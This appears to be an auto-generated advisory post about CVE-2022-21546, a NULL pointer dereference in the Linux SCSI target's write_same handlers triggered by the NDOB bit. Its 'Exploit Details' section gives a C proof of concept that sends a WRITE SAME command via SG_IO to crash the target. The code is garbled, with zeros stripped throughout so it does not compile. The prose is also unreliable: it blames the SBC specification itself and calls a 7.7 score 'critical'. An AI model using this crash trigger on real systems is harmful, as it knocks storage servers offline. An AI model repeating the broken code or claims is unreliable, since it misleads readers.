CVE-2022-21546: NDOB Bit Exploit and Crash in Newer SBC Specs - Impacting Availability

A newly discovered security vulnerability, known as CVE-2022-21546, affects the newer version of the SCSI Block Command (SBC) specifications by taking advantage of the No Data-Out Buffer (NDOB) bit, causing the system to crash due to a NULL pointer dereference. When exploited, this vulnerability compromises availability and has a CVSS 3.1 base score of 7.7. The CVSS vector for this issue is CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H.

Overview

The SCSI Block Command (SBC) is a set of protocols for communicating with block I/O devices such as hard disks and solid-state drives. In these newer SBC specifications, a new feature has been introduced: the No Data-Out Buffer (NDOB) bit. When set, the NDOB bit specifies that no data buffer operation should take place, and the device should acknowledge the command without writing any data.

However, the improper handling of the NDOB bit during the execution of "write_same" commands can cause a crash in target_core_iblock/file's execute_write_same handlers. This crash occurs due to the null pointer dereference when trying to access the se_cmd->t_data_sg, as it was never initialized.

Exploit Details

As mentioned earlier, the vulnerability can be exploited using commands such as sg_write_same --ndob. Below is a code snippet demonstrating how the exploit could be performed:

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <scsi/sg.h>

int main(int argc, char *argv[]) {
    int sg_fd;
    unsigned char cmd[10] = {x93, , , , , , , , , }; // Write Same (10) command

    sg_fd = open("/dev/sgX", O_RDWR); // Replace X with the proper device number

    if (sg_fd < ) {
        perror("Failed to open device");
        return 1;
    }

    // Set flags for no data buffer operation (NDOB)
    cmd[1] |= x08;

    // Send Write Same command via IOCTL
    struct sg_io_hdr io_hdr;
    memset(&io_hdr, , sizeof(struct sg_io_hdr));
    io_hdr.interface_id = 'S';
    io_hdr.cmd_len = sizeof(cmd);
    io_hdr.cmdp = cmd;
    io_hdr.dxfer_direction = SG_DXFER_NONE;

    if (ioctl(sg_fd, SG_IO, &io_hdr) < ) {
        perror("Failed to execute Write Same command");
        close(sg_fd);
        return 1;
    }

    close(sg_fd);
    return ;
}

This code snippet sends a Write Same (10) command with the NDOB bit set, which triggers the crash in target_core_iblock/file's execute_write_same handlers.

Here are the links to the original references for more information on CVE-2022-21546

1. CVE-2022-21546 | NVD - CVE Details
2. SCSI Block Commands - 4 (SBC-4)

Mitigation

Vendors and developers are advised to provide a patch for this vulnerability as soon as possible. Meanwhile, users should ensure they have the latest firmware and software updates applied to their systems. Additionally, administrators should restrict access to vulnerable devices to trusted users only.

Conclusion

CVE-2022-21546 is a critical vulnerability in the newer version of the SCSI Block Command (SBC) specifications. When exploited, the vulnerability can cause a system crash due to a NULL pointer dereference, compromising the availability of the affected system. System administrators and users are urged to take appropriate steps to mitigate the issue and monitor for any available patches.

Timeline

Published on: 05/02/2025 22:15:15 UTC
Last modified on: 05/05/2025 20:54:19 UTC